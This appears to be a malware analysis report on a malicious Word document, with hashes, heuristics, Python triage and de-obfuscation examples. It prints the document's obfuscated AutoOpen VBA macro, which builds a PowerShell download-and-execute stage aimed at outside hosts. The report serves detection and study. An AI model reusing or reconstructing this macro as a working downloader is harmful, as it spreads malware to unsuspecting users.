Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8ff51b8a6823376d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 130.0 KB
Created: 2018-02-12 19:51:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: b64546e52401a78e316c07cf2288959d
SHA-1: 35715d03be573c6ff9d8b9e1a79a1adfbc80c984
SHA-256: 8ff51b8a6823376dc08b13467f0382782f77b77f0a8d1fd27bee2a6d854dcdd4
Risk score: 242

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a malicious Word document whose VBA project contains an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. AutoOpen calls Application.Run to invoke a second macro, passing it the string assembled by the function slAjShvwAXAvVM(), and the OLE_VBA_SHELL finding below shows that the project calls Shell() to launch the resulting command. The visible source builds that command from string fragments padded with junk tokens (cUI+cUI, T4p+T4p, 0hr+0hr and '+'); the text that survives token removal contains PowerShell syntax (System.Net.WebClient, -creplace with [char]92, [char]34 and [char]96), i.e. a PowerShell download-and-execute stage. The URL reported by the analyzer, http://www.sbktrcUI+cUIavDFbOzait/k1uT4pcUI+cUI+T4p+T4pr6drtw/?hT4p+T4ptp:T4pr//www.sbktrcUI+cUIavDFbOzait, still carries those junk tokens, so it is not a cleanly reconstructed URL; treat it as evidence of downloader behaviour rather than as a usable network indicator. Taken together, this is downloader/dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6447097-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447097-0.
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell(), i.e. it can launch an external program or command line.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen procedure is present; Word runs it automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This check is what catches p-code-only documents and documents whose source cannot be extracted (for example after VBA stomping), where no readable macro source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no modern VBA project recovered and no stronger macro-virus family marker present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not fit this sample: its VBA project was recovered (see macros.bas below), so here the marker adds nothing beyond the AutoOpen finding.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not a detection in itself; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace identifier and is expected in Office files; it is not a network indicator.
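The OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings above encode the basic macro-triage rule: an auto-execution entry point paired with an execution sink. The following is an added example of that rule applied to extracted VBA source; it is not the analyzer's own code. The sample it scans is constructed from lines of the macro preview on this page plus a Shell() stub, because the page reports a Shell() call that the truncated preview does not show; the stub's body is an assumption.

```python
"""VBA macro triage: pair an auto-execution entry point with an execution sink.

Added example, not the analyzer's own code. It reproduces the logic behind the
OLE_VBA_AUTOOPEN / OLE_VBA_SHELL findings on extracted macro source.
"""
import re
from dataclasses import dataclass

# Procedure names Word/Excel run without user interaction.
AUTO_EXEC = {"autoopen", "autoexec", "autoclose", "autonew", "document_open",
             "document_close", "auto_open", "workbook_open", "workbook_activate"}

# Execution and download sinks, with the tag and severity scale used on this page.
SINKS = {
    "Shell":             ("OLE_VBA_SHELL", "critical"),
    "WScript.Shell":     ("OLE_VBA_SHELL", "critical"),
    "URLDownloadToFile": ("OLE_VBA_EXEC", "critical"),
    "Application.Run":   ("OLE_VBA_EXEC", "high"),
    "CreateObject":      ("OLE_VBA_EXEC", "high"),
    "GetObject":         ("OLE_VBA_EXEC", "high"),
    "MSXML2.XMLHTTP":    ("OLE_VBA_EXEC", "high"),
    "ADODB.Stream":      ("OLE_VBA_EXEC", "high"),
}

PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)


@dataclass
class Finding:
    tag: str
    severity: str
    line_no: int
    evidence: str


def strip_comment(line):
    """Drop a trailing ' comment, but not an apostrophe inside a "..." literal
    (the obfuscated strings in this sample are full of '+' sequences)."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan_vba(source):
    """Return one Finding per auto-exec procedure and per sink reference."""
    findings = []
    for no, raw in enumerate(source.splitlines(), start=1):
        code = strip_comment(raw)
        m = PROC_RE.match(code)
        if m and m.group(1).lower() in AUTO_EXEC:
            findings.append(Finding("OLE_VBA_AUTOOPEN", "high", no, m.group(1)))
        for sink, (tag, sev) in SINKS.items():
            if re.search(r"\b" + re.escape(sink) + r"\b", code, re.I):
                findings.append(Finding(tag, sev, no, sink))
    return findings


def triage(source):
    """Auto-exec alone is common in templates; auto-exec plus a sink is the
    pattern the page's heuristics treat as downloader behaviour."""
    findings = scan_vba(source)
    tags = {f.tag for f in findings}
    auto_exec = "OLE_VBA_AUTOOPEN" in tags
    exec_sink = bool(tags & {"OLE_VBA_SHELL", "OLE_VBA_EXEC"})
    return {"findings": findings, "auto_exec": auto_exec,
            "exec_sink": exec_sink, "suspicious": auto_exec and exec_sink}


# Constructed sample: the AutoOpen / Application.Run / Mid() lines from the
# preview, plus a Shell() stub standing in for the call the page reports but
# does not show (the stub body is an assumption).
SAMPLE_VBA = """Attribute VB_Name = "NJKUjoDzJQwwOs"
Sub AutoOpen()
On Error Resume Next
nZaJBERkf = CkoaL - Sgn(jiYYGflkwiIub) - (8007116 - Tan(1728946) / 4434221 - ChrW(GuIbSC))
Application.Run "ufjYiBZtoGam", slAjShvwAXAvVM
End Sub
Function slAjShvwAXAvVM()
On Error Resume Next
OEiEKqv = qviJwRH + Mid(PPsP + "RshmAtr+0hrcUI+cUItes0hr+0hr.magnums'+'pcUI+cUIort" + twwNsO, 7, 191)
End Function
' Constructed stand-in for the second macro; its real body is not in the preview.
Sub ufjYiBZtoGam(cmd)
Shell cmd, vbHide
End Sub
"""

if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for f in result["findings"]:
        print(f"line {f.line_no:>3} {f.severity:<8} {f.tag:<18} {f.evidence}")
    print("suspicious:", result["suspicious"])
```

The comment stripper matters more than it looks: a naive split on the apostrophe would cut every obfuscated literal at its first '+' and hide sinks that follow it on the same line. Source-level scanning is also exactly what the OLE_VBA_PCODE_AUTOEXEC_EXEC finding exists to complement; when the source stream is empty or stomped, the p-code stream has to be checked instead.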

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26355 bytes
SHA-256: 0c2427f433d73556394670372e7fdd9b24758fa3384cfb6e0260e8a40182cb5b
Script preview (first 1,000 lines of the extracted macro; the listing is truncated on this page)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NJKUjoDzJQwwOs"
Sub AutoOpen()
On Error Resume Next
nZaJBERkf = CkoaL - Sgn(jiYYGflkwiIub) - (8007116 - Tan(1728946) / 4434221 - ChrW(GuIbSC))
fwUUaVVEj = tEWC - Sgn(zHnpKS) - (9216754 - Tan(4518324) / 1674671 - ChrW(CfWhjCSObsal))
LLPddYmil = UAHmUmHjjaL - Sgn(YpwWDEbpuJ) - (7398025 - Tan(2601639) / 9415407 - ChrW(ZhpXkaEPK))
Application.Run "ufjYiBZtoGam", slAjShvwAXAvVM
WathjGsIz = jnaiGViHv - Sgn(LNtpsMZuMqlaI) - (5999848 - Tan(5417748) / 9239826 - ChrW(XujBB))
mnQpzCiBC = IWzIhEp - Sgn(jwvJoGi) - (9040413 - Tan(521078) / 2103183 - ChrW(KMMqJ))
bGZDMXMLn = RmfTOFi - Sgn(CDFdwKKEz) - (4459526 - Tan(7876711) / 8404149 - ChrW(vfph))
End Sub
Function slAjShvwAXAvVM()
On Error Resume Next
avVWqlonuwd = WzqwVjRpqLzYIH - Sgn(vVNtYp) - (3574981 - Tan(4382237) / 458031 - ChrW(QQFaIwS))
rpjfGonm = QjtFhoRAS - Sgn(DPTHHd) - (636942 - Tan(5572790) / 111649 - ChrW(pJDaodFQMOhOhz))
pawpijjLa = aXpnYbXXDSmzI - Sgn(cWfwS) - (7155857 - Tan(1244409) / 5658231 - ChrW(RDjBoDh))
OEiEKqv = qviJwRH + Mid(PPsP + "RshmAtr+0hrcUI+cUItes0hr+0hrt0hr+0hr.magnums'+'pcUI+cUIort.c'+'o0hr+0hrm/k1uT4pcUI+cUI+T4p0hr+0hT4p+T4pr60hr+0hrd0hr+0hrt0hr+0hrw0hr+0hr/?'+'hT4p+T4pt0hr+0hrtp:0hr+0hT4p+T4pr//'+'www.sbktrcUI+cUIavDFbOzait" + twwNsO, 7, 191)
hFKMIbafo = jTWcEdscW - Sgn(qUuTU) - (5687866 - Tan(2015559) / 2999317 - ChrW(ntELfYTJi))
kOBMrjrSvw = ApFnwiSdizA - Sgn(fNi) - (2135071 - Tan(9530870) / 3920305 - ChrW(RTuIJBjfIrElU))
jmEawmkz = sWUljw - Sgn(BAfSZjNqcUa) - (9744276 - Tan(3139112) / 2427335 - ChrW(FjvlRC))
lFqnab = iVPjFNpcYRmzH + Mid(dwH + "uJFmUScliPswwuNYne0hr+0hrxt0hr+0T4p+T4phr(100000hT4p+T4pr+0hr, T4p+T4p2820hr+0hr130hr+0hr30hr+0hr);A9TADCX0hr+0hr = 0hr+0hrO0hr+0hrvGT4p+T4p0hr+0hr'+' 0hr+0hrhttp0hrT'+'4'+'p+T4p+0hr:0hr+0hr//0hZP" + rBRPMlzFYjo, 17, 178)
DkiQr = bRn - Sgn(viirNFGutaAO) - (8950663 - Tan(1889371) / 5159441 - ChrW(wzqp))
LtoJkA = TzOdP - Sgn(YbnLZakVsZXFJ) - (6835245 - Tan(8064443) / 4802010 - ChrW(oRcULvFiazicf))
cKBHhjt = OwJhSGO - Sgn(nKohjYrjG) - (4156348 - Tan(8867136) / 1357839 - ChrW(LnaMjijwc))
YTJjNhzmmG = maLfpnqO + Mid(QXHPTPqj + "hSTMSJpdDmlphr+0hr = 0hr+0hr&(OvGnOvG0hr+0hr+0hr+0'+'hrOvGeO0hT4p+cUI+cUIT4pDDaZZwdBuzZqrJGjFKWpcY" + SojWimE, 14, 63)
XMWGVVkKpG = mXhbKEv - Sgn(dOkjEwb) - (5740641 - Tan(2368701) / 6397899 - ChrW(uiUBtElz))
UtwjFzAzQBw = oMHwR - Sgn(luvmTNlJiR) - (452463 - Tan(2748228) / 7479078 - ChrW(GuhVo))
iVUEMIZb = mRVoXZHjjRHo - Sgn(YMjiZN) - (1685810 - Tan(1875412) / 4937297 - ChrW(krpwmEtfmHd))
idacd = tNFJHzB + Mid(SdOiRjiM + "KlUNwpk4p+T4p(0hr+0hrAT4p+T4p90hr+0cUI+cUIhrT0hrT4p+T4p+0hracUI+cUI0hr+cUI+cUI0hrs'+'fc.0hr+0hrd0hr+0hrQuTocUI+cUIStr0h'+'r+0hrl0hr+0hrGn0hr'+'+0hrilGnNgdQu()0hr+0hr,0hr+0hr T4p+T4pA0wmvEAGFhRiosVDrMGinT" + nurIiYtCKi, 8, 176)
nFjKRV = bKTD - Sgn(wVadq) - (6833425 - Tan(7833374) / 5765050 - ChrW(XibwhonKiS))
qQtjX = VpdpjMkFTkz - Sgn(dVPJKSqrfBGO) - (8055709 - Tan(1148109) / 7567496 - ChrW(ETQbARnHslwdwj))
iZTFCWWzwl = waqzd - Sgn(icrraFT) - (6819191 - Tan(2869523) / 9872008 - ChrW(ZoAzUVnLi))
vAZBfEQbI = TZHPuFBcQKNzOw + Mid(MHHjiMflw + "diNpwrSAYt0hcUI+cUIrv0hr+0T4p+T4phrG-ob0hrT4p+T4'+'p+0hrcUI+cUIjT4p+T4pectO0hr+0hrvG0hr+0hr) System0hr+0hr.NetcUI+cUIT4p+T4pcUI+cUI'+'.'+'WebCl0hr+0hrie0T4p+T4phr'+'+cUI'+'+cUI0hrnt;A0hr+0zUYpMXdiNzFfKRUpFXooKIkLib" + bUfnmUhmds, 11, 178)
htnZHlstTw = uKMDVfhJdZa - Sgn(SPKaJvlOwPkonA) - (1596405 - Tan(6653524) / 2556958 - ChrW(ijwVPTNnDF))
fbiPDIL = DqwClCoAIBjTo - Sgn(faXPUWzvzrrD) - (9491204 - Tan(9987032) / 8210165 - ChrW(VrjVv))
POYVc = lmBzTiEd - Sgn(PIh) - (6933333 - Tan(8780032) / 8037410 - ChrW(iitHsHLi))
mzwvBdVZSb = RZWMtwqK + Mid(zIKdaqYkZMTX + "ESpTLMozBhTstmWRhrT4p+T4pqVT4p+T4pU0hr,[ChAR]92 -cREPlacE  0h'+'rdQu'+'0hr,[cUI+cUIChAR]34 -cREPlacE 0hrlGn0hcUI+cUIrT4p+T4'+'p,[T4p+T4pChAR]96  -
... (truncated)
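The preview shows how the second-stage command is assembled: each string literal is padded with junk, the macro's Mid(start, length) call cuts the payload portion out of it, and the junk tokens cUI+cUI, T4p+T4p, 0hr+0hr and '+' are removed afterwards. The tokens nest (a T4p+T4p only becomes removable once the cUI+cUI inside it is gone), which is why the "reconstructed URL" in the summary still contains them: a single replacement pass is not enough. The following is an added example of the cleanup, not the analyzer's code; the token list, the fixed-point removal, and the assumption that the unassigned variables around each literal (PPsP, twwNsO, ...) are Empty and contribute nothing are all inferred from the visible source. The order in which the fragments are later concatenated, and how the remaining single 0hr markers become PowerShell quote characters, is not visible in the preview, so the output is partially de-junked text, not a verified URL or command line.

```python
"""Strip the nested junk tokens from the string literals in the macro preview.

Added example, not the analysis platform's code. Token list and Mid() offsets
are taken from the visible macro source on this page.
"""

# Junk tokens inferred from the preview. They nest, e.g. "k1uT4pcUI+cUI+T4p"
# only becomes a removable "T4p+T4p" after "cUI+cUI" is gone, so strip_junk()
# loops until nothing changes instead of doing one pass.
JUNK_TOKENS = ("'+'", "cUI+cUI", "T4p+T4p", "0hr+0hr")


def strip_junk(s, tokens=JUNK_TOKENS):
    """Remove junk tokens until a fixed point is reached."""
    while True:
        before = s
        for tok in tokens:
            s = s.replace(tok, "")
        if s == before:
            return s


def vba_mid(s, start, length=None):
    """VBA Mid(): start is 1-based, length is a character count."""
    i = start - 1
    return s[i:] if length is None else s[i:i + length]


# Literals copied verbatim from the preview, keyed by the variable they are
# assigned to, with the Mid() arguments the macro applies to them. The
# variables concatenated around each literal are never assigned in the visible
# source (assumed Empty), so Mid() operates on the literal alone. The last
# literal is cut off by the page's truncation, so it has no Mid() arguments.
FRAGMENTS = {
    "OEiEKqv": (7, 191, "RshmAtr+0hrcUI+cUItes0hr+0hr.magnums'+'pcUI+cUIort.c'+'o0hr+0hrm/k1uT4pcUI+cUI+T4p0hr+0hT4p+T4pr60hr+0hrd0hr+0hrt0hr+0hrw0hr+0hr/?'+'hT4p+T4ptp:0hr+0hT4p+T4pr//'+'www.sbktrcUI+cUIavDFbOzait"),
    "lFqnab": (17, 178, "uJFmUScliPswwuNYne0hr+0hrxt0hr+0T4p+T4phr(100000hT4p+T4pr+0hr, T4p+T4p2820hr+0hr130hr+0hr30hr+0hr);A9TADCX0hr+0hr = 0hr+0hrO0hr+0hrvGT4p+T4p0hr+0hr'+' 0hr+0hrhttp0hrT'+'4'+'p+T4p+0hr:0hr+0hr//0hZP"),
    "vAZBfEQbI": (11, 178, "diNpwrSAYt0hcUI+cUIrv0hr+0T4p+T4phrG-ob0hrT4p+T4'+'p+0hrcUI+cUIjT4p+T4pectO0hr+0hrvG0hr+0hr) System0hr+0hr.NetcUI+cUIT4p+T4pcUI+cUI'+'.'+'WebCl0hr+0hrie0T4p+T4phr'+'+cUI'+'+cUI0hrnt;A0hr+0zUYpMXdiNzFfKRUpFXooKIkLib"),
    "mzwvBdVZSb": (1, None, "ESpTLMozBhTstmWRhrT4p+T4pqVT4p+T4pU0hr,[ChAR]92 -cREPlacE  0h'+'rdQu'+'0hr,[cUI+cUIChAR]34 -cREPlacE 0hrlGn0hcUI+cUIrT4p+T4'+'p,[T4p+T4pChAR]96  -"),
}


def decode_fragments(fragments=FRAGMENTS):
    """Apply Mid() and then junk stripping to each literal; returns name -> text."""
    return {name: strip_junk(vba_mid(lit, start, length))
            for name, (start, length, lit) in fragments.items()}


def leftover_markers(text, marker="0hr"):
    """Count single markers that survive stripping; they sit at fragment edges
    and around PowerShell string arguments, so they hint at the next layer."""
    return text.count(marker)


if __name__ == "__main__":
    for name, text in decode_fragments().items():
        print(f"{name:<11} ({leftover_markers(text)} x 0hr left): {text}")
```

Running it shows the PowerShell pieces the summary refers to: the random-number call next(10000, 282133), a System.Net.WebClient object, a host path fragment ending in .magnumsport.com/k1u6dtw/, and the -creplace arguments where the leftover 0hr markers bracket qVU, dQu and lGn exactly where quoted strings belong before [ChAR]92, [ChAR]34 and [ChAR]96. Leftovers such as r+0hr at a fragment start and 0h at a fragment end show that tokens also span fragment boundaries, so the real cleanup must run on the concatenated string, in the order the macro joins the pieces, which the preview does not show.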